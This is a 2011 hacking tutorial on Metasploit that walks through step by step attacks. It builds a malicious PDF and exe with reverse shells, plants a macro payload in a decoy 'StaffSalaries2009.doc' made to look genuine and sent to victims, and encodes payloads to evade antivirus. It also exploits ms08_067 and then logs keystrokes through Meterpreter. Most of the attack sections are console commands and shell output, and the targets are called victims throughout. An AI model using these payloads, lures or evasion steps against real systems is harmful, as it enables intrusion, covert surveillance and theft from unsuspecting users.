ADVANCED HACKING WITH METASPLOIT

29/05/2011 23:51

The Metasploit Framework is a platform for developing, testing, and using exploit code.
The Metasploit Project is a computer security project which provides information about security
vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known
sub-project is the Metasploit Framework, a tool for developing and executing exploit code against
a remote target machine. Other important sub-projects include the Opcode Database, shellcode
archive, and security research.
The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are
built into the Metasploit Framework.
Metasploit was created in 2003 as a portable network game using the Perl scripting language.
Later, the Metasploit Framework was then completely rewritten in the Ruby programming
language. It is most notable for releasing some of the most technically sophisticated exploits to
public security vulnerabilities. In addition, it is a powerful tool for third party security researchers
to investigate potential vulnerabilities.
Like comparable commercial products such as Immunity's CANVAS or Core Security
Technologies Core Impact, Metasploit can be used by administrators to test the vulnerability of
computer systems in order to protect them, or by Black Hat hackers and script kiddies to break into
remote systems. Like many information security tools, Metasploit can be used for both legitimate
and unauthorized activities.
Metasploit Framework
The basic steps for exploiting a system using the Framework include -
1. Choosing and configuring an exploit (code that enters a target system by taking advantage
of one of its bugs; about 300 different exploits for Windows, Unix/Linux and Mac OS X
systems are included);
2. Checking whether the intended target system is susceptible to the chosen exploit (optional);

3. Choosing and configuring a payload (code that will be executed on the target system upon
successful entry, for instance a remote shell or a VNC server);
4. Choosing the encoding technique to encode the payload so that the Intrusion-prevention
system will not catch the encoded payload;
5. Executing the exploit.
This modularity of allowing combining any exploit with any payload is the major advantage of the
Framework: it facilitates the tasks of attackers, exploit writers, and payload writers.
Download: http://www.metasploit.com/

Remote Hacking with Metasploit

We can hack any remote machine with help of pdf file, just create pdf file with help of
metasploit with embed exploit for remote control/shell.
Requirement:
At server side:
1. Linux machine with Metasploit
2. Linux server have selinux and firewall disabled
3. Multi handler in listen mode
At client (victim side):
1. Adobe acrobat 8.1.1
Steps:
Install Linux and download metasploit and extract at desktop.
# cd Desktop
# cd framework
# ./msfconsole
 use exploit/windows/fileformat/adobe_collectmailinfo
 set payload windows/shell/reverse_tcp
 set filename indiahack.pdf
 set LHOST 192.168.1.108
set LPORT 8080
exploit
A pdf File creat on Data\exploit folder.
Note:
LHOST= Our Linux machine IP(static,dynamic)
LPORT= Local port for communication
After copy this PDF file or create a zip file and send to victim. But before setup multi handler
module to accept connections.

# ./msfconsole
 use exploit/multi/handler
 set payload windows/shell/reverse_tcp
 set exitonsession TRUE
 set LHOST 192.168.1.108
 set LPORT 8080
 exploit

We got a reverse command prompt of victim with full administrative rights.
Video URL: www.thesecretofhacking.com/vd/ch12/cs1
Different popular payloads:
1. windows/meterpreter/reverse_tcp
2. windows/vncinject/reverse_tcp
Important Commands:
> show payloads
> show exploits
> info
> show options
Create Custom Virus Applications for Windows*
We can create custom exe windows virus to get command prompt, VNC desktop, meterpreter
shell.
# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.108 LPORT=8080 X>/root/mk.exe
After copy mk.exe in pan drivestart multi handler:
#./msfconsole
> use exploit/multi/handler
>set payload windows/shell/reverse_tcp
>set LHOST 192.168.1.108
>set LPORT 8080
>exploit
After We got the remote command shell with full rights.

[*] Command shell session 1 opened (192.168.1.108:8080 -> 192.168.1.106:1040)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>systeminfo
systeminfo
Host Name: WINXP
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation


C:\Documents and Settings\Administrator>

Create Macro Virus

Steps to create a VBA (Visual Basic for Applications) payload using Metasploit Framework and
stick that into a Microsoft Office Word 2003 document. When the target users open up the
document we will get a command line prompt. The process is divided in four parts.
Part1 - Payload generation
./msfpayload windows/shell_reverse_tcp LPORT=5000 LHOST=192.168.1.108 V>
/var/www/win.sh_rev_tcp.1.108-5000.txt
Part2 - Attacker's end-point preparation
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 5000
LPORT => 5000
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[pentester waits here for victim to eat the bait...once file is opened a shell is spawned as follows]
[*] Command shell session 1 opened (192.168.1.108:5000 -> 192.168.1.106:1040)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>systeminfo
systeminfo
Host Name: WINXP
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
...
...
C:\Documents and Settings\Administrator>
Part3 - Wrap bait into Office Word document
a. First, we need to copy the contents of file win.sh_rev_tcp.1.108-5000.txt, generated in Part1
over to our Windows machine. Having a web server at the Linux site is always handly, we just
opening up Firefox and pointing to http://192.168.1.108/win.sh_rev_tcp.1.108-5000.txt
b. Now, create a new MS Office Word 2003 document, named it StaffSalaries2009.doc.
c. Open the new document, go to Tools | Macro | Visual Basic Editor
d. On the left hand side, double click on the ThisDocument icon, the area where you should paste
the code will popup in the middle of the screen
e. Paste the code from win.sh_rev_tcp.1.108-5000.txt
f. Save the script into the document by clicking the Save icon at the toolbar, do File | Close and
Return to Microsoft Word
g. Add some data to your fishie document so to look genuine, Save and Exit
h. Distribute the document and hold back
* The above also apply for Office Excel documents, however please note that the generated Visual
Basic code should be saved into ThisWorkbook item instead of ThisDocument, as per instruction
d.
Part4 - Distribution etc
Having done all these, you can send the file as an attachment or save to a shared area where your
victims can spot it and fire it up, if their Macro Security (Tools | Macro | Security... ) level is set to
low your goal will be achieved instantly. In any other case the users will get a friendly message
telling them "The macros in this project are disabled. Please refer to the online help or
documentation of the host application to determine how to enable macros." with an OK and Help
button, pressing the Help button tells them exactly where to click so to enable macros.
Video URL: www.thesecretofhacking.com/vd/ch12/cs3
How to Encode Normal Virus into Undectable Virus*
#./msfencode –h (for Help)
# ./msfencode x86/shikata_ga_nai –I mk.exe –t exe>newencode.exe

Advanced Payload (Meterpreter)
When attempting to exploit a remote system, an attacker has a specific objective in mind—
typically to obtain the command shell of the remote system, and thereby run arbitrary commands
on that system.The attacker would also like to do this in as stealthy a manner as
possible, as well as evade any Intrusion Detection Systems (IDSes).
If the exploit is successful but the command shell fails to work or is executing in a chroot
environment, the attacker’s options would be severely limited. This would mean the
launching of a new process on the remote system, which would result in a high-visibility situation
where a good administrator or forensics analyst would first see the list of running
processes on a suspect system. Also, the attacker usually has one shot at launching a command
shell or running an arbitrary command.
This is where the Meterpreter (short for Meta-Interpreter) comes in. The Meterpreter is
one of the advanced payloads available with the MSF. The way to look at the Meterpreter is
not simply as a payload, but rather as an exploit platform that is executed on the remote
system.The Meterpreter has its own command shell, which provides the attacker with a
wide variety of activities that can be executed on the exploited system.
Additionally, the Meterpreter allows developers to write their own extensions in the
form of DLL files that can be uploaded and executed on the remote system.Thus, any programming
language in which programs can be compiled into DLLs can be used to develop
Meterpreter extensions.
But the real beauty of the Meterpreter is that it runs by injecting itself into the vulnerable
running process on the remote system once exploitation occurs. All commands run
through Meterpreter also execute within the context of the running process. In this manner,
it is able to avoid detection by anti-virus systems or basic forensics examinations. A forensics
expert would need to carry out a live response by dumping and analyzing the memory of
www.syngress.com
Meterpreter’s Default Commands
Extensions available with Meterpreter include:
 Fs Used for uploading and downloading files.
 Net Used for creating port forwards similar to the way Secure Shell (SSH) does.
This is very useful when using this system to pivot onto internal systems. It also
provides commands for viewing the network configuration of the compromised
system.
 Process Used for viewing the list of running processes, executing an arbitrary
process, or killing a process on the remote system.
 Sys Used for getting various sorts of system information.
# getuid
# execute –f cmd.exe
#execute –f cmd –c
#upload source destination
#download source destination

Remote Keystroke Sniffing with Meterpreter
Earlier this afternoon, I committed some code to allow keystroke sniffing through Meterpreter
sessions. This was implemented as set of new commands for the stdapi extension of Meterpreter.
Dark Operator, author of many great Meterpreter scripts, already wrote a nice blog post describing
how to use the new keystroke sniffer, but I wanted to cover some of the internals and limitations as
well.
The keyscan_start command spawns a new thread inside of the process where Meterpreter was
injected. This thread allocates a large 1Mb buffer to store captured keystrokes. Every 30 ms, this
thread calls GetAsyncKeyState, which returns the up/down status of each of the 256 possible
Virtual Key Codes. If a key state change is detected and the new state is down, the key, along with
the Shift, Control, and Alt flags are stored into the buffer as 16-bit value. If the entire buffer is
used, it skips back to the beginning and overwrites old entries. This poll/compare method is based
on a keyboard status application written by Rick, who presented at the last San Antonio Hackers
meeting (and presents at Austin Hackers frequently).
One limitation of the GetAsyncKeyState function is that it must have access to the active, input
desktop in order to monitor the key states. This presents a problem when the target process is
running as a service. In the case of the VNC injection payload, we jump through a series of hoops
to get access to the input desktop. This sequence has now been implemented as the grabdesktop
command, but this is still not sufficient in many cases. If the service does not have rights to
interact with the desktop, no amount of API jumping allows the GetAsyncKeyState function to
receive keystrokes from the user.
Fortunately, Meterpreter supports the migrate command, which allows us to move our running
code into a process that does have interactive access to the desktop. In the example below, we will
use ms08_067_netapi exploit to obtain a Meterpreter shell on a Windows XP SP2 system, then
migrate the running payload into the Explorer.exe process owned by the active user. This allows us
to then use the keyscan_start and keyscan_dump commands to log the user's keystrokes.
$ ./msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability...

[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop...
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
This is a test of the keystroke logger <Comma> I am typing this inside of notepad.